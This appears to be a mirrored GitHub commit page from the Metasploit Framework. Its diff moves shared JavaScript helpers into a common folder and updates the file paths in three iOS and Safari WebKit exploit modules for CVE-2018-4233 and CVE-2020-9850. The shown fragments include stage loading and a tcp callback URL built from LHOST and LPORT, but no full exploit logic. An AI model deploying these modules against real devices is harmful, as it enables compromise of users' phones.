mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-07-18 18:31:41 +02:00
move int64.js and utils.js to javascript_utils folder
This commit is contained in:
parent
46db23c35e
commit
9150f0bc3a
@ -6,6 +6,7 @@
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
@ -61,11 +62,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
])
|
||||
end
|
||||
|
||||
def exploit_data(directory, file)
|
||||
path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
|
||||
::File.binread path
|
||||
end
|
||||
|
||||
def payload_url
|
||||
"tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
|
||||
end
|
||||
@ -304,8 +300,8 @@ function get_mem_rw(stage1) {
|
||||
^
|
||||
|
||||
get_mem_rw = (version >= Gem::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10
|
||||
utils = exploit_data "CVE-2018-4233", "utils.js"
|
||||
int64 = exploit_data "CVE-2018-4233", "int64.js"
|
||||
utils = exploit_data "javascript_utils", "utils.js"
|
||||
int64 = exploit_data "javascript_utils", "int64.js"
|
||||
dump_offsets = ''
|
||||
if datastore['DUMP_OFFSETS']
|
||||
dump_offsets = %Q^
|
||||
|
@ -484,8 +484,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
return
|
||||
end
|
||||
|
||||
utils = exploit_data 'CVE-2018-4233', 'utils.js'
|
||||
int64 = exploit_data 'CVE-2018-4233', 'int64.js'
|
||||
utils = exploit_data 'javascript_utils', 'utils.js'
|
||||
int64 = exploit_data 'javascript_utils', 'int64.js'
|
||||
stage0 = exploit_data 'CVE-2020-9850', 'stage0.bin'
|
||||
stage1 = exploit_data 'CVE-2020-9850', 'loader.bin'
|
||||
stage2 = exploit_data 'CVE-2020-9850', 'sbx.bin'
|
||||
|
@ -6,6 +6,7 @@
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
@ -75,11 +76,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
}
|
||||
end
|
||||
|
||||
def exploit_data(directory, file)
|
||||
path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
|
||||
::File.binread path
|
||||
end
|
||||
|
||||
def stage1_js
|
||||
stage1 = exploit_data "CVE-2018-4233", "stage1.bin"
|
||||
"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);"
|
||||
@ -140,8 +136,8 @@ EOF
|
||||
return
|
||||
end
|
||||
|
||||
utils = exploit_data "CVE-2018-4233", "utils.js"
|
||||
int64 = exploit_data "CVE-2018-4233", "int64.js"
|
||||
utils = exploit_data "javascript_utils", "utils.js"
|
||||
int64 = exploit_data "javascript_utils", "int64.js"
|
||||
html = %Q^
|
||||
<html>
|
||||
<body>
|
||||
|
Loading…
Reference in New Issue
Block a user